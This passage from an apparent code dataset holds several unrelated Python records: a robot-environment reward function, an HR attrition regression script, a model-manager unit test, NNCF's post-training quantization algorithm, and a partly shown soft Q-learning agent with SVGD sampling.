= -d\n if d<=0.1 and not self.get_point:\n r+=50.\n self.grab_counter+=1\n if self.grab_counter>t:\n r+=100\n self.get_point =True\n elif d>0.1:\n self.grab_counter=0\n self.get_point =False\n\n if (collision[0]==1. or collision[1]==1.) and (not self.get_obstacles):\n r=-300*collision[0]-300*collision[1]+r\n self.obstacles_counter+=1\n self.get_obstacles=True\n return r\n\nif __name__ == '__main__':\n env = VREP_server()\n\n # for i in range(1000):\n # a = env.sample_action()\n # s,_,_,danger= env.step(a)\n #\n # print(s[-2:])\n","sub_path":"new_env.py","file_name":"new_env.py","file_ext":"py","file_size_in_byte":13234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"14235674","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\nimport numpy as np\n\nmanager_survey = pd.read_csv('C:/htoc/biof309/final-project/data/hr-analytics-case-study/manager_survey_data.csv')\nemployee_survey = pd.read_csv('C:/htoc/biof309/final-project/data/hr-analytics-case-study/employee_survey_data.csv')\ngeneral_data = pd.read_csv('C:/htoc/biof309/final-project/data/hr-analytics-case-study/general_data.csv')\n\npd.set_option('display.max_columns', None)\n\n#print(employee_survey.shape)\n#print(employee_survey.head())\n#print(manager_survey.shape)\n#print(manager_survey.head())\n#print(general_data.shape)\n#print(general_data.head())\n\nattrition_data = pd.merge(general_data,pd.merge(manager_survey,employee_survey,on='EmployeeID',how='inner'),on='EmployeeID',how='inner')\n\nattrition_data.columns = attrition_data.columns.str.lower()\n\n(dim1,dim2) = attrition_data.shape\n\nfor i in range(dim2) :\n print(attrition_data.columns[i],'\\t',round(attrition_data.iloc[ :,i].count()/dim1,2))\n\nattrition_data = attrition_data.dropna()\n(dim1,dim2) = attrition_data.shape\n\n\n#from sklearn.linear_model import LogisticRegression\n#from sklearn.metrics import classification_report, confusion_matrix\npd.crosstab(attrition_data['attrition'],columns=\"count\",colnames=[''])\n\nattrition_data['attrition'] = np.where(attrition_data['attrition']==\"Yes\",1,0) # reset attrition as a 0-1 variable\n\npd.crosstab(attrition_data['attrition'],columns=\"count\",colnames=[''])\n\n\nnumvars = ['age', 'monthlyincome', 'numcompaniesworked', 'percentsalaryhike', 'totalworkingyears', 'yearsatcompany', 'yearssincelastpromotion', 'yearswithcurrmanager'] \n\n\nfacvars=['businesstravel','department','education','educationfield','gender','joblevel','jobrole','maritalstatus','stockoptionlevel','jobinvolvement','performancerating','environmentsatisfaction','jobsatisfaction', 'worklifebalance']\nprint(facvars)\n\nprint(numvars)\n\n\npd.crosstab(attrition_data['businesstravel'],columns=\"count\",colnames=[''])\nattrition_data['travelalot'] = np.where(attrition_data['businesstravel']==\"Travel_Frequently\",1,0)\npd.crosstab(attrition_data['travelalot'],columns=\"count\",colnames=[''])\n\npd.crosstab(attrition_data['department'],columns=\"count\",colnames=[''])\nattrition_data['randddepartment'] = np.where(attrition_data['department']==\"Research & Development\",1,0)\npd.crosstab(attrition_data['randddepartment'],columns=\"count\",colnames=[''])\n\npd.crosstab(attrition_data['educationfield'],columns=\"count\",colnames=[''])\nattrition_data['sciencemedicaleduc'] = np.where(attrition_data['educationfield'].isin(['Life Sciences','Medical']),1,0)\npd.crosstab(attrition_data['sciencemedicaleduc'],columns=\"count\",colnames=[''])\n\npd.crosstab(attrition_data['gender'],columns=\"count\",colnames=[''])\nattrition_data['male'] = np.where(attrition_data['gender']==\"Male\",1,0)\npd.crosstab(attrition_data['male'],columns=\"count\",colnames=[''])\n\npd.crosstab(attrition_data['jobrole'],columns=\"count\",colnames=[''])\nattrition_data['researchjob'] = np.where(attrition_data['jobrole'].isin(['Research Director','Research Scientist']),1,0)\npd.crosstab(attrition_data['researchjob'],columns=\"count\",colnames=[''])\n\npd.crosstab(attrition_data['maritalstatus'],columns=\"count\",colnames=[''])\nattrition_data['evermarried'] = np.where(attrition_data['maritalstatus']==\"Single\",0,1)\npd.crosstab(attrition_data['evermarried'],columns=\"count\",colnames=[''])\n\npd.crosstab(attrition_data['environmentsatisfaction'],columns=\"count\",colnames=[''])\nattrition_data['highworkenvironment'] = np.where(attrition_data['environmentsatisfaction']>2,1,0)\npd.crosstab(attrition_data['highworkenvironment'],columns=\"count\",colnames=[''])\n\npd.crosstab(attrition_data['jobsatisfaction'],columns=\"count\",colnames=[''])\nattrition_data['highjobsatisfaction'] = np.where(attrition_data['jobsatisfaction']>2,1,0)\npd.crosstab(attrition_data['highjobsatisfaction'],columns=\"count\",colnames=[''])\n\npd.crosstab(attrition_data['worklifebalance'],columns=\"count\",colnames=[''])\nattrition_data['highworklifebalance'] = np.where(attrition_data['worklifebalance']>2,1,0)\npd.crosstab(attrition_data['highworklifebalance'],columns=\"count\",colnames=[''])\n\n\npd.crosstab(attrition_data['male'],columns=\"count\",colnames=[''])\nattrition_data['male'] = np.where(attrition_data['gender']==\"Male\",1,0)\npd.crosstab(attrition_data['male'],columns=\"count\",colnames=[''])\n\n\n\nnewfacvars = (\n['travelalot','researchjob','evermarried','highworkenvironment','highjobsatisfaction','highworklifebalance']\n)\n\njobs = attrition_data[['attrition']+numvars+newfacvars]\n\nfrom sklearn.model_selection import train_test_split\nX = jobs[numvars+newfacvars] # Features\ny = jobs.attrition # Target variable\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.25,random_state=0)\n\n\ntrain = X_train\ntrain = train.assign(attrition=list(y_train))\nprint(\"\\nTraining data head\")\nprint(train.head())\nprint(train.shape)\n \nimport matplotlib.pyplot as plt\nfrom statsmodels.formula.api import logit\nimport statsmodels.api as sm\n\n# show categorical variables\n#for var in facvars: \n# print('\\n \\n Univariate analysis of '+var)\n# train[var].hist() \n# plt.show()\n# form1 = 'attrition ~ C('+var+')' \n# fit = logit(form1,data=train).fit()\n# print(fit.summary())\n\n# show continuous variables\n \nfor var in numvars: \n print('\\n \\n Univariate analysis of '+var)\n print(train[var].describe()) \n form1 = 'attrition ~ '+var \n fit = logit(form1,data=train).fit()\n print(fit.summary())\n\n\nfor var in newfacvars: \n print('\\n \\n Univariate analysis of '+var)\n print(train[var].describe()) \n form1 = 'attrition ~ '+var \n fit = logit(form1,data=train).fit()\n print(fit.summary())\n\n\n\n#variables to keep for Lasso approach - those with p-value < .10\n \n \n# recode categorical variables into 0-1 categories\n# business travel\n\n\n \n#numvars2 = ['age']\n#\n#newfacvars2 = [\n# 'highjobsatisfaction']\n\nfrom sklearn.linear_model import LogisticRegressionCV, LogisticRegression\n\nfrom sklearn.metrics import classification_report, confusion_matrix\n\nX_tr = train[numvars+newfacvars]\ny_tr = y_train\nXstan_tr = ((X_tr-X_tr.mean())/X_tr.std())\n\n\nclf = LogisticRegressionCV(Cs=30,cv=20,random_state=0,penalty='l1',solver='liblinear').fit(Xstan_tr,y_tr)\nclf.coef_\nclf.C_\npredprobs = pd.DataFrame(clf.predict_proba(Xstan_tr)).iloc[:,1]\n\npredprobs.describe()\n\npd.crosstab(y_tr,columns=\"count\")/y_tr.count()\ncutpoint = predprobs.quantile(1-.16062)\n#zeroone = np.where(predprobs > predprobs.quantile(1-.16062),1,0)\n#pd.DataFrame(zeroone).describe()\n\n\n#\n#y_pred = clf.predict(Xstan_tr)\n#conf_m = confusion_matrix(y_tr,y_pred)\n#print(conf_m)\n#\n#confusion_matrix(y_tr,y_pred)\n#confusion_matrix(y_tr,zeroone)\n\n\ntest = X_test\ntest = test.assign(attrition=list(y_test))\nprint(\"\\nTesting data head\")\nprint(test.shape)\n\nX_te = test[numvars+newfacvars]\ny_te = y_test\nXstan_te = ((X_te-X_te.mean())/X_te.std())\n\n\n#clf = LogisticRegressionCV(Cs=30,cv=20,random_state=0,penalty='l1',solver='liblinear').fit(Xstan_te,y_te)\n#clf.coef_\n#clf.C_\npd.DataFrame(clf.predict_proba(Xstan_te)).iloc[:,1].describe()\n\n#predprobs = pd.DataFrame(clf.predict_proba(Xstan_te)).iloc[:,1]\npd.crosstab(y_te,columns=\"count\")/y_te.count()\ncutpoint = predprobs.quantile(1-.16)\nzeroone = np.where(predprobs > cutpoint,1,0)\npd.DataFrame(zeroone).describe()\n\n\n\ny_pred = clf.predict(Xstan_te)\nconf_m = confusion_matrix(y_te,y_pred)\nprint(conf_m)\n\nconfusion_matrix(y_te,y_pred)\nconfusion_matrix(y_te,zeroone)\n\n\n\n#clf = LogisticRegression(solver='lbfgs',penalty='none').fit(X,y)\n\n\nX = jobs[numvars+newfacvars]\ny = jobs.attrition \nXstan = ((X-X.mean())/X.std())\n\nXstan2 = sm.add_constant(Xstan_tr)\n\nmodel = sm.Logit(y_tr, Xstan2)\nresult = model.fit_regularized(method='l1',alpha=clf.C_)\nresult.summary()\n#\n#Xstan['y'] = y\n#Xstan.to_csv('c:\\\\htoc\\\\biof309\\\\final-project\\\\data\\\\Xstan.csv')\n#\n\nfrom sklearn.ensemble import RandomForestClassifier\n\nclf = RandomForestClassifier(n_estimators=50).fit(X_tr,y_tr)\ny_pred_tr = clf.predict(X_tr)\nconfusion_matrix(y_tr,y_pred)\n\ny_pred2 = clf.predict(X_te)\nconfusion_matrix(y_te,y_pred2)\n\nprint('Variable importance for Random Forest \\n')\npd.DataFrame(clf.feature_importances_,columns = ['Importance'],index=X_te.columns).sort_values(by=['Importance'],ascending=False)\n","sub_path":"hr-script.py","file_name":"hr-script.py","file_ext":"py","file_size_in_byte":8242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"2509256","text":"\"\"\"Test model functionality.\"\"\"\n\nimport unittest\nfrom colepy.utils import model_loader, model_saver, model_remover\nimport os\nfrom sklearn.linear_model import LinearRegression\n\n\nclass ManagerTest(unittest.TestCase):\n\n def model_manager_test(self):\n model = LinearRegression()\n self.assertFalse(os.path.exists('./local/models/linear'))\n model_saver(model_name='linear', model=model)\n self.assertTrue(os.path.exists('./local/models/linear'))\n model_saver(model_name='linear', model=model)\n\n model_dict = model_loader(model_name='linear')\n self.assertEqual(2, len(model_dict))\n model_remover(model_name='linear', keeps=1)\n model_dict = model_loader(model_name='linear')\n self.assertEqual(1, len(model_dict))\n model_remover(model_name='linear', keeps=0)\n self.assertFalse(os.path.exists('./local/models/linear'))\n","sub_path":"tests/manager_test.py","file_name":"manager_test.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"226261485","text":"# Copyright (c) 2023 Intel Corporation\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom dataclasses import dataclass\nfrom typing import Callable, Dict, List, Optional, TypeVar\n\nfrom nncf import Dataset\nfrom nncf.common.deprecation import warning_deprecated\nfrom nncf.common.factory import NNCFGraphFactory\nfrom nncf.common.factory import StatisticsAggregatorFactory\nfrom nncf.common.graph.graph import NNCFGraph\nfrom nncf.common.logging import nncf_logger\nfrom nncf.common.quantization.structs import QuantizationPreset\nfrom nncf.common.tensor_statistics.statistic_point import StatisticPointsContainer\nfrom nncf.common.utils.backend import BackendType\nfrom nncf.common.utils.backend import copy_model\nfrom nncf.common.utils.backend import get_backend\nfrom nncf.parameters import ModelType\nfrom nncf.parameters import TargetDevice\nfrom nncf.quantization.advanced_parameters import AdvancedQuantizationParameters\nfrom nncf.quantization.algorithms.algorithm import Algorithm\nfrom nncf.quantization.algorithms.bias_correction.algorithm import BIAS_CORRECTION_THRESHOLD\nfrom nncf.quantization.algorithms.bias_correction.algorithm import BiasCorrection\nfrom nncf.quantization.algorithms.channel_alignment.algorithm import ChannelAlignment\nfrom nncf.quantization.algorithms.fast_bias_correction.algorithm import FAST_BIAS_CORRECTION_THRESHOLD\nfrom nncf.quantization.algorithms.fast_bias_correction.algorithm import FastBiasCorrection\nfrom nncf.quantization.algorithms.min_max.algorithm import MinMaxQuantization\nfrom nncf.quantization.algorithms.smooth_quant.algorithm import SmoothQuant\nfrom nncf.quantization.passes import insert_null_biases_pass\nfrom nncf.scopes import IgnoredScope\n\nTModel = TypeVar(\"TModel\")\nTPass = Callable[[TModel], TModel]\n\n\nclass PostTrainingQuantization(Algorithm):\n \"\"\"\n Implements Post-Training Quantization algorithm, which basically includes:\n 1) ChannelAlignment\n 2) MinMaxQuantization\n 3) FastBiasCorrection or BiasCorrection\n \"\"\"\n\n @dataclass\n class FirstStageAlgorithm:\n algorithm: \"Algorithm\"\n pre_passes: List[TPass]\n\n def __init__(\n self,\n preset: QuantizationPreset = QuantizationPreset.PERFORMANCE,\n target_device: TargetDevice = TargetDevice.ANY,\n subset_size: int = 300,\n fast_bias_correction: bool = True,\n model_type: Optional[ModelType] = None,\n ignored_scope: Optional[IgnoredScope] = None,\n advanced_parameters: Optional[AdvancedQuantizationParameters] = None,\n ):\n \"\"\"\n :param preset: A preset that controls the quantization mode\n (symmetric and asymmetric). It can take the following values:\n - `performance`: Symmetric quantization of weights and activations.\n - `mixed`: Symmetric quantization of weights and asymmetric\n quantization of activations.\n :param target_device: A target device the specificity of which will be taken\n into account while compressing in order to obtain the best performance\n for this type of device.\n :param subset_size: Size of a subset to calculate activations\n statistics used for quantization.\n :param fast_bias_correction: Setting this option to `False` enables a different\n bias correction method which is more accurate, in general, and takes\n more time but requires less memory.\n :param model_type: Model type is needed to specify additional patterns\n in the model. Supported only `transformer` now.\n :param ignored_scope: An ignored scope that defined the list of model control\n flow graph nodes to be ignored during quantization.\n :param advanced_parameters: Advanced quantization parameters for\n fine-tuning the quantization algorithm\n \"\"\"\n super().__init__()\n self.algorithms = []\n self.first_stage_algorithms: List[self.FirstStageAlgorithm] = []\n\n if target_device is TargetDevice.VPU:\n warning_deprecated(\"VPU device is deprecated and will no longer be supported in the future.\")\n\n if advanced_parameters is None:\n advanced_parameters = AdvancedQuantizationParameters()\n\n if model_type == ModelType.TRANSFORMER:\n smooth_quant_algorithm = SmoothQuant(\n subset_size=subset_size,\n inplace_statistics=advanced_parameters.inplace_statistics,\n alpha=advanced_parameters.smooth_quant_alpha,\n )\n self.first_stage_algorithms.append(self.FirstStageAlgorithm(smooth_quant_algorithm, []))\n\n if not advanced_parameters.disable_channel_alignment:\n channel_alignment = ChannelAlignment(\n subset_size=subset_size,\n inplace_statistics=advanced_parameters.inplace_statistics,\n backend_params=advanced_parameters.backend_params,\n )\n self.first_stage_algorithms.append(self.FirstStageAlgorithm(channel_alignment, [insert_null_biases_pass]))\n\n min_max_quantization = MinMaxQuantization(\n preset=preset,\n target_device=target_device,\n subset_size=subset_size,\n model_type=model_type,\n ignored_scope=ignored_scope,\n overflow_fix=advanced_parameters.overflow_fix,\n quantize_outputs=advanced_parameters.quantize_outputs,\n inplace_statistics=advanced_parameters.inplace_statistics,\n activations_quantization_params=advanced_parameters.activations_quantization_params,\n weights_quantization_params=advanced_parameters.weights_quantization_params,\n activations_range_estimator_params=advanced_parameters.activations_range_estimator_params,\n weights_range_estimator_params=advanced_parameters.weights_range_estimator_params,\n backend_params=advanced_parameters.backend_params,\n )\n\n self.algorithms.append(min_max_quantization)\n\n if advanced_parameters.disable_bias_correction:\n return\n\n bias_correction_params = advanced_parameters.bias_correction_params\n if fast_bias_correction:\n threshold = FAST_BIAS_CORRECTION_THRESHOLD\n if bias_correction_params.threshold is not None:\n threshold = bias_correction_params.threshold\n bias_correction = FastBiasCorrection(\n subset_size=subset_size,\n threshold=threshold,\n apply_for_all_nodes=bias_correction_params.apply_for_all_nodes,\n inplace_statistics=advanced_parameters.inplace_statistics,\n backend_params=advanced_parameters.backend_params,\n )\n else:\n threshold = BIAS_CORRECTION_THRESHOLD\n if bias_correction_params.threshold is not None:\n threshold = bias_correction_params.threshold\n bias_correction_subset_size = max(int(subset_size * 0.2), 1)\n bias_correction = BiasCorrection(\n subset_size=bias_correction_subset_size,\n threshold=threshold,\n apply_for_all_nodes=bias_correction_params.apply_for_all_nodes,\n inplace_statistics=advanced_parameters.inplace_statistics,\n backend_params=advanced_parameters.backend_params,\n )\n\n self.algorithms.append(bias_correction)\n\n @property\n def available_backends(self) -> Dict[str, BackendType]:\n return\n\n def get_statistic_points(self, model: TModel, graph: NNCFGraph) -> StatisticPointsContainer:\n if self.first_stage_algorithms:\n raise NotImplementedError(\n \"Statistic points are not supported yet for SmoothQuant and ChannelAlignment algorithms.\"\n )\n\n output = StatisticPointsContainer()\n for algorithm in self.algorithms:\n for statistic_points in algorithm.get_statistic_points(model, graph).values():\n for statistic_point in statistic_points:\n output.add_statistic_point(statistic_point)\n return output\n\n def apply(\n self,\n model: TModel,\n graph: NNCFGraph,\n statistic_points: Optional[StatisticPointsContainer] = None,\n dataset: Optional[Dataset] = None,\n ) -> TModel:\n modified_model = copy_model(model)\n modified_model_graph = graph\n backend = get_backend(modified_model)\n\n for first_stage_algorithm in self.first_stage_algorithms:\n algorithm = first_stage_algorithm.algorithm\n\n if isinstance(algorithm, SmoothQuant) and backend != BackendType.OPENVINO:\n nncf_logger.debug(f\"{backend.name} does not support SmoothQuant algorithm yet.\")\n continue\n\n if isinstance(algorithm, ChannelAlignment) and backend != BackendType.OPENVINO:\n nncf_logger.debug(f\"{backend.name} does not support ChannelAlignment algorithm yet.\")\n continue\n\n for pre_pass in first_stage_algorithm.pre_passes:\n modified_model = pre_pass(modified_model, modified_model_graph)\n modified_model_graph = NNCFGraphFactory.create(modified_model)\n\n statistics_aggregator = StatisticsAggregatorFactory.create(modified_model, dataset)\n algo_statistic_points = algorithm.get_statistic_points(modified_model, modified_model_graph)\n statistics_aggregator.register_statistic_points(algo_statistic_points)\n statistics_aggregator.collect_statistics(modified_model, modified_model_graph)\n modified_model = algorithm.apply(\n modified_model, modified_model_graph, statistics_aggregator.statistic_points\n )\n modified_model_graph = NNCFGraphFactory.create(modified_model)\n\n if statistic_points is None:\n statistics_aggregator = StatisticsAggregatorFactory.create(modified_model, dataset)\n for algorithm in self.algorithms:\n algo_statistic_points = algorithm.get_statistic_points(modified_model, modified_model_graph)\n statistics_aggregator.register_statistic_points(algo_statistic_points)\n\n statistics_aggregator.collect_statistics(modified_model, modified_model_graph)\n statistic_points = statistics_aggregator.statistic_points\n\n for algorithm in self.algorithms[:-1]:\n modified_model = algorithm.apply(modified_model, modified_model_graph, statistic_points)\n modified_model_graph = NNCFGraphFactory.create(modified_model)\n # building the model graph is not required after the last algorithm\n modified_model = self.algorithms[-1].apply(modified_model, modified_model_graph, statistic_points)\n\n return modified_model\n","sub_path":"nncf/quantization/algorithms/post_training/algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":11275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"34558175","text":"import os\nimport torch as T\nimport torch.nn.functional as F\nimport numpy as np\nfrom buffer import ReplayBuffer\n#from networks import ActionValueNetwork, SamplerNetwork\nfrom torch.distributions.uniform import Uniform\nfrom torch.distributions.normal import Normal\nfrom networks import SamplingNetwork, MLPQFunction\nimport torch.optim as optim\nimport time\nfrom copy import deepcopy\n\n\nfrom multigoal import MultiGoalEnv\n\n\n\n\n\nclass Agent():\n def __init__(self, env_fn, hidden_dim, \n replay_size, gamma, pi_lr, q_lr, batch_size, n_particles):\n\n self.env= MultiGoalEnv()\n \n self.gamma = gamma\n self.n_particles = n_particles\n self.batch_size = batch_size\n\n \n \n self.env, self.test_env = self.env, self.env\n self.obs_dim = self.env.observation_space.shape\n \n self.action_dim = self.env.action_space.shape[0]\n self.action_bound = self.env.action_space.high[0]\n \n # Action limit for clamping: critically, assumes all dimensions share the same bound!\n \n # Create actor-critic module and target networks\n self.Q_Network = MLPQFunction(self.env.observation_space, self.env.action_space, hidden_dim)\n #self.ac_targ = deepcopy(self.ac)\n \n self.SVGD_Network = SamplingNetwork(batch_size = self.batch_size, n_particles = self.n_particles,\n observation_space= self.env.observation_space, action_space = self.env.action_space)\n # # Freeze target networks with respect to optimizers (only update via polyak averaging)\n # for p in self.ac_targ.parameters():\n # p.requires_grad = False\n \n # Set up optimizers for policy and q-function\n self.q_optimizer = optim.Adam(self.Q_Network.parameters(), lr=q_lr)\n self.sampler_optimizer = optim.Adam(self.SVGD_Network.parameters(), lr=pi_lr)\n \n \n # Experience buffer\n self.replay_buffer = ReplayBuffer(obs_dim=self.obs_dim, act_dim=self.action_dim, size=replay_size)\n\n def rbf_kernel(self, input_1, input_2, h_min=1e-3):\n k_fix, out_dim1 = input_1.size()[-2:]\n k_upd, out_dim2 = input_2.size()[-2:]\n assert out_dim1 == out_dim2\n \n # Compute the pairwise distances of left and right particles.\n diff = input_1.unsqueeze(-2) - input_2.unsqueeze(-3)\n # N * k_fix * 1 * out_dim / N * 1 * k_upd * out_dim/ N * k_fix * k_upd * out_dim\n dist_sq = diff.pow(2).sum(-1)\n # N * k_fix * k_upd\n dist_sq = dist_sq.unsqueeze(-1)\n # N * k_fix * k_upd * 1\n \n # Get median.\n median_sq = T.median(dist_sq, dim=1)[0]\n median_sq = median_sq.unsqueeze(1)\n # N * 1 * k_upd * 1\n \n h = median_sq / np.log(k_fix + 1.) + .001\n # N * 1 * k_upd * 1\n \n kappa = T.exp(-dist_sq / h)\n # N * k_fix * k_upd * 1\n \n # Construct the gradient\n kappa_grad = -2. * diff / h * kappa\n return kappa, kappa_grad\n \n \n \n def compute_millowmax_target(self, Q_values):\n # beta = 1\n # mm_weights = []\n \n # max_Q = T.max(Q_values, dim=1)[0]\n \n mm_target = T.logsumexp(Q_values, dim=1) + T.log(T.tensor(1/self.n_particles))\n \n # denominator = T.sum(T.exp(beta * Q_values - max_Q.unsqueeze(-1)), dim=1)\n \n # for i in range(self.n_particles):\n # current_Q = Q_values[:, i]\n # current_Q_exp = T.exp(beta * current_Q - max_Q)\n # mm_weights.append(list((current_Q_exp / denominator).detach().numpy()))\n \n # mm_weights = T.tensor(np.array(mm_weights, dtype=np.double)).view(-1, self.n_particles)\n \n # mm_target = T.sum(Q_values * mm_weights, dim=1)\n \n return mm_target\n \n \n # Set up function for computing DDPG Q-loss\n def compute_loss_q(self, data):\n o, a, r, o2, d = data['obs'], data['act'], data['rew'], data['obs2'], data['done']\n \n aplus = T.from_numpy(self.SVGD_Network.act(o2,n_particles=self.n_particles))\n #print(\"aplus=\",aplus.shape)\n \n q = self.Q_Network(o,a)\n \n \n # Bellman backup for Q function\n with T.no_grad():\n Q_soft_ = self.Q_Network(o2, aplus,n_sample=self.n_particles)\n V_soft_ = T.logsumexp(Q_soft_, dim=1)\n V_soft_ += self.action_dim * T.log(T.tensor([2.]))\n #mm_target = self.compute_millowmax_target(Q_soft_)\n #print(mm_target)\n #backup = r + self.gamma * (1 - d) * mm_target\n backup = r + self.gamma * (1 - d) * V_soft_\n \n # MSE loss against Bellman backup\n loss_q = ((q - backup)**2).mean()\n \n # Useful info for logging\n loss_info = dict(QVals=q.detach().numpy())\n \n # print(f'loss_q: {loss_q}')\n # print(f'q_pi_targ: {q_pi_targ}')\n # print(f'q1: {q}')\n \n return loss_q, loss_info\n \n \n \n def update_svgd_ss(self, data):\n \n o = data['obs']\n actions = self.SVGD_Network(o,n_particles=self.n_particles)\n assert actions.shape == (self.batch_size,self.n_particles, self.action_dim)\n \n fixed_actions = self.SVGD_Network.act(o,n_particles=self.n_particles)\n fixed_actions = T.from_numpy(fixed_actions)\n fixed_actions.requires_grad = True\n svgd_target_values = self.Q_Network(o, fixed_actions,n_sample = self.n_particles)\n \n # squash_correction = T.sum(T.log(1 - fixed_actions**2 + 1e-6), dim=-1)\n # svgd_target_values = T.add(svgd_target_values, squash_correction)\n \n \n # Target log-density. Q_soft in Equation 13:\n \n log_p = svgd_target_values\n \n \n grad_log_p = T.autograd.grad(log_p.sum(), fixed_actions)[0]\n grad_log_p = grad_log_p.view(self.batch_size,self.n_particles, self.action_dim).unsqueeze(2)\n grad_log_p = grad_log_p.detach()\n assert grad_log_p.shape == (self.batch_size, self.n_particles, 1, self.action_dim)\n \n kappa, gradient = self.rbf_kernel(input_1=fixed_actions, input_2=actions)\n \n # Kernel function in Equation 13:\n # kappa = kappa.unsqueeze(dim=3)\n assert kappa.shape == (self.batch_size, self.n_particles, self.n_particles, 1)\n \n \n anneal = 1.\n action_gradients = (1/self.n_particles)*T.sum(anneal*kappa * grad_log_p + gradient, dim=1)\n assert action_gradients.shape == (self.batch_size, self.n_particles, self.action_dim)\n \n # Propagate the gradient through the policy network (Equation 14).\n self.sampler_optimizer.zero_grad()\n T.autograd.backward(-actions,grad_tensors=action_gradients)\n self.sampler_optimizer.step()\n \n def learn(self, data):\n \n self.q_optimizer.zero_grad()\n loss_q, loss_info = self.compute_loss_q(data)\n loss_q.backward()\n self.q_optimizer.step()\n \n # update stein sampler \n self.update_svgd_ss(data)\n #This PLACE\n \n \n \n def get_sample(self, o,n_sample=1):\n a = self.SVGD_Network.act(T.as_tensor(o, dtype=T.float32),n_particles=n_sample)\n # a += act_noise * np.random.randn(act_dim)\n return np.clip(a, -self.action_bound, self.action_bound) \n \n \n def plot_paths(self, epoch):\n paths = []\n actions_plot=[]\n env = MultiGoalEnv()\n \n for episode in range(30):\n observation = env.reset()\n done = False\n step = 0\n path = {'infos':{'pos':[]}}\n particles = None\n while not done and step < 30 :\n \n actions = self.get_sample(observation,1)\n \n observation, reward, done, _ = env.step(actions)\n path['infos']['pos'].append(observation)\n step +=1\n paths.append(path)\n print(\"saving figure..., epoch=\",epoch)\n # with open('./actions_'+str(epoch)+'.txt', 'w') as filehandle:\n # for listitem in actions_plot:\n # filehandle.write('%s\\n' % listitem) \n env.render_rollouts(paths,fout=\"test_%d.png\" % epoch)\n \n \n\n\n# class Agent():\n# def __init__(self, beta=0.0003, state_dim=[8], action_dim=2, n_particles=16,\n# env=None, gamma=0.99, max_size=int(1e6), tau=0.005, max_action=1000,\n# batch_size=100, reward_scale=1):\n \n# self.gamma = gamma\n# self.tau = tau\n# self.memory = ReplayBuffer(max_size, state_dim, action_dim)\n# self.batch_size = batch_size\n# self.action_dim = action_dim\n# self.n_particles = n_particles\n \n# self.update_ratio = 0.5\n\n\n# # Q Network\n# self.Q_Network = ActionValueNetwork(lr=1e-3, state_dim=state_dim, action_dim=action_dim,\n# n_particles=n_particles, name='ActionValueNetwork')\n# self.Q_Network.double()\n# # q Arbitrary Network\n# self.SVGD_Network = SamplerNetwork(lr=1e-3, state_dim=state_dim, action_dim=action_dim,\n# n_particles=n_particles, max_action=max_action)\n# self.SVGD_Network.double()\n# self.reward_scale = reward_scale\n\n# def remember(self, state, action, reward, new_state, done):\n# self.memory.store_transition(state, action, reward, new_state, done)\n\n# def save_models(self):\n# print('.... saving models ....')\n# self.Q_Network.save_checkpoint()\n# self.SVGD_Network.save_checkpoint()\n \n\n# def load_models(self):\n# print('.... loading models ....')\n# self.Q_Network.save_checkpoint()\n# self.SVGD_Network.save_checkpoint()\n \n \n \n# def rbf_kernel(self, input_1, input_2, h_min=1e-3):\n \n# k_fix, out_dim1 = input_1.size()[-2:]\n# k_upd, out_dim2 = input_2.size()[-2:]\n# assert out_dim1 == out_dim2\n \n# leading_shape = input_1.size()[:-2]\n# # Compute the pairwise distances of left and right particles.\n# diff = input_1.unsqueeze(-2) - input_2.unsqueeze(-3)\n# # N * k_fix * 1 * out_dim / N * 1 * k_upd * out_dim/ N * k_fix * k_upd * out_dim\n# dist_sq = diff.pow(2).sum(-1)\n# # N * k_fix * k_upd\n# dist_sq = dist_sq.unsqueeze(-1)\n# # N * k_fix * k_upd * 1\n \n# # Get median.\n# median_sq = T.median(dist_sq, dim=1)[0]\n# median_sq = median_sq.unsqueeze(1)\n# # N * 1 * k_upd * 1\n \n# h = median_sq / np.log(k_fix + 1.) + .001\n# # N * 1 * k_upd * 1\n \n# kappa = T.exp(-dist_sq / h)\n# # N * k_fix * k_upd * 1\n \n# # Construct the gradient\n# kappa_grad = -2. * diff / h * kappa\n# return kappa, kappa_grad\n \n \n \n# def get_Q_value(self, state, action, particles=False, training=False): \n# # (bs, sd), (bs, np, ad)\n \n \n# if training and particles:\n# # Training with particles\n# Q_soft = self.Q_Network.forward(state.unsqueeze(1).double(), action.double())\n \n \n# elif training and not particles:\n# # Training without particles\n# Q_soft = self.Q_Network.forward(state.double(), action.double())\n \n# elif not training and particles:\n# # Evaluating with particles\n# Q_soft = self.Q_Network.forward(state.double(), action.double())\n \n# return Q_soft\n \n \n \n \n# def choose_action_uniform(self, particles=False, reparameterize=True):\n# if particles:\n# low = T.full((self.batch_size, self.n_particles, self.action_dim), -1.)\n# high = T.full((self.batch_size, self.n_particles, self.action_dim), 1.)\n# else:\n# low = T.full((self.batch_size, self.action_dim), -1.)\n# high = T.full((self.batch_size, self.action_dim), 1.)\n# dist = Uniform(low, high)\n# noise = dist.sample()\n# return noise, dist\n \n \n# def get_action_svgd(self, state, training=False, particles=False):\n# # Sample noise from normal distribution\n \n# if training and particles:\n# low = T.full((self.batch_size, self.n_particles, self.action_dim), -1.)\n# high = T.full((self.batch_size, self.n_particles, self.action_dim), 1.)\n# dist = Uniform(low, high)\n# noise = dist.sample()\n# actions = self.SVGD_Network.forward(state.double().unsqueeze(1), noise.double())\n# elif training and not particles:\n# low = T.full((self.batch_size, self.action_dim), -1.)\n# high = T.full((self.batch_size, self.action_dim), 1.)\n# dist = Uniform(low, high)\n# noise = dist.sample()\n# #print(noise)\n# actions = self.SVGD_Network.forward(state.double(), noise.double())\n# elif not training and not particles:\n# low = T.full((1, 1, self.action_dim), -1.)\n# high = T.full((1, 1, self.action_dim), 